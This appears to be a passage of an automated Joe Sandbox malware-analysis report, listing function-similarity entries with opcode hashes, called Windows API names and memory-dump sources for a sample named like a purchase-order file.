                                                                                                                                                                                                      • Instruction ID: fc093b3e9e10bf552c1be73b27f7c8da03df1a2de4767d2e187352050fe1c2e5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 933f474a9053b05bc16a2fd55a7a1634dc82e1a2e246d14b81b82702670c5ed1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F71D6719083848FEB25CF25D44479A7BD0EB55308F0C897FD8899F3A2D7B99885CB4A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00C118A8: GetFileAttributesW.KERNEL32(?), ref: 00C118B3
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C12182
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesCreateDirectoryFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3401506121-0
                                                                                                                                                                                                      • Opcode ID: afa8d1e3fe8e7b16fa15fd92d3e8d3f63daaa6f2f40d0e8ef1005d43e1b91b7f
                                                                                                                                                                                                      • Instruction ID: 945b3e7d0a1028bf45be9a0c36a06cd817b87858a48b308eef350347c5b35350
                                                                                                                                                                                                      • Opcode Fuzzy Hash: afa8d1e3fe8e7b16fa15fd92d3e8d3f63daaa6f2f40d0e8ef1005d43e1b91b7f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2451A435A1120896EF14EFA0D844BEE737AEF58300F108568BA09F7280E7799F44C7A5
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __flush.LIBCMT ref: 00422A0B
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __flush__getptd_noexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4101623367-0
                                                                                                                                                                                                      • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                                                                                      • Instruction ID: 8f2a899de28b9b8ac1dd69c8cddf2acff934126b4057793d23fbf70436a2ef8e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB41E870700726BFDB288EA9E68056F77A6AF45350F54852FE845C7640DAF8DD818B48
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 30a94bf250d92e3fba99ec90635b8193a08d577e42682136395b56f398947aba
                                                                                                                                                                                                      • Instruction ID: 8d334a3f077af1a70f2cb3a6203528adb1f73b4833e6e5e5a2425a8609d8aadc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30a94bf250d92e3fba99ec90635b8193a08d577e42682136395b56f398947aba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4331CF71D0C7409ADB359B79C5483F9BBBC6BA2720F4C869AD0898B1A3D67E8C04D752
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                      • Instruction ID: e1e9453dff8cdd36c9b53572e70871791048215458511bd1f5cf1fdffc6e0534
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B231FC78A00106DBC718DF1AE4809A9F7B6FF49340B6486A6E809CB355DB34EDC1CB85
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                      • Opcode ID: e45942e84992e6f3b1645fd07b77c47882f9ff211bf848f68ad3990d9c1ab5da
                                                                                                                                                                                                      • Instruction ID: 123904f6986cbe28aed5baaaa90aadec874594827bf1280dce4f1c7dc905d36c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e45942e84992e6f3b1645fd07b77c47882f9ff211bf848f68ad3990d9c1ab5da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2416D705086118FDB24DF14C044B5ABBE1BF85308F1989ADE99A4B362C37AFC86CF56
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00404214: FreeLibrary.KERNEL32(00000000,?), ref: 00404247
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB
                                                                                                                                                                                                        • Part of subcall function 00404291: FreeLibrary.KERNEL32(00000000), ref: 004042C4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Free$Load
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2391024519-0
                                                                                                                                                                                                      • Opcode ID: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
                                                                                                                                                                                                      • Instruction ID: 1f80cfd2d09e1638bed56b013e730591200b4cfe8bff1834d2c9f7d5b423193b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C871700206AADB10BB71DC06B9E77A99FC0748F10847EF656B61C1DB789A059B58
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                      • Opcode ID: 1de68fc35cfaf652e3383879fa389902897bbb6150a75f3ec4224c709fbbe5cf
                                                                                                                                                                                                      • Instruction ID: a3e8d651301d5cdfce25b2048ede81e560c51bdd0112b26095fcab813be825f0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de68fc35cfaf652e3383879fa389902897bbb6150a75f3ec4224c709fbbe5cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC2146705082018FDB24DF25C444B5ABBE1BF84308F14896EF59A4B362C779F886CF5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___lock_fhandle.LIBCMT ref: 0042AFC0
                                                                                                                                                                                                        • Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1144279405-0
                                                                                                                                                                                                      • Opcode ID: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
                                                                                                                                                                                                      • Instruction ID: 72f555c6501e1ce87cd012baef782597da69394b83e16657c689296a690b0a37
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B711B672B046308FD7127FA5B90175A7B609F42339F96424AE4705B1E2CBBC9D008BAE
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                      • Opcode ID: ff274b9b901517ccfe501b5a2682be08e668cdd6e77a1f6f2abeaa8aab47e341
                                                                                                                                                                                                      • Instruction ID: 5795f379ffda854187e78de3b8cb619d796d7aa9d6cc714e9125621e421c79c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff274b9b901517ccfe501b5a2682be08e668cdd6e77a1f6f2abeaa8aab47e341
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 910192B1C0D7409ECB259B3994143F6BBBC7F56320F09C79AE4859B1A3D6788C04DB52
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                      • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                                                                                                      • Instruction ID: e462a9ed68780897a26be5b7c37f438fac53c332684aae35b8fe6951bdcf7267
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D018671500109EECF04EF65C8918FEBF78AF20344F00806FB515A71E5EA349A49DF68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00422AED
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2597487223-0
                                                                                                                                                                                                      • Opcode ID: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
                                                                                                                                                                                                      • Instruction ID: 5589abf0bb1310eb904447484f268859338ac04dd37c0e0a6a4a15a0a52f55d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CF0C231700225BADF21AF76AD023DF3AA1BF40318F96442BB4149B191C7BC8A52DB59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,004039FE,?,00000001), ref: 00404286
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                      • Opcode ID: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
                                                                                                                                                                                                      • Instruction ID: 74f35774a27debaa66b6be3da2798f9a4b53b6784b46458f95cdd3b3f822c893
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65F0A0B0605301CFCB349F60D484816B7F0BF443653208ABFF2C692650C3399840DF44
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004040C6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongNamePath
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 82841172-0
                                                                                                                                                                                                      • Opcode ID: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
                                                                                                                                                                                                      • Instruction ID: 0290631fc8dec078d58f0ec9d0cf7d10399dccf95bf213d32d7819efeea1db69
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE07D326001241BC711A254CC46FEE73ACDF8C6A4F050079F905E3244DA7499808794
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C118B3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                                                                      • Instruction ID: 08fa8cd05aa4ed30775089d030b4ae62505f7ad9087db845e6c7c48e9a0293dc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41E08C3092920CEBEF10CAAAC904AE973A8AB06320F148654AE16C32C0D6388E90F750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C11883
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                                                                      • Instruction ID: 17bd363b51c38d23d5a0e6f24398599a9ef78655465cfbc12e1369f9a90a73c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0D05E3091520CEBDB10CAB4D9049E973A8DB06320F108765EE15832C0D5359A40A750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                      • Instruction ID: 352b242676a210c9ba98b2f91a7b230a8f1a1251b78f4586efc19ea558914ddb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07E0BF7494010DEFDB00EFA4D5496DD7BB4EF04301F1005A1FD05E7680DB309E549A62
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3472027048-0
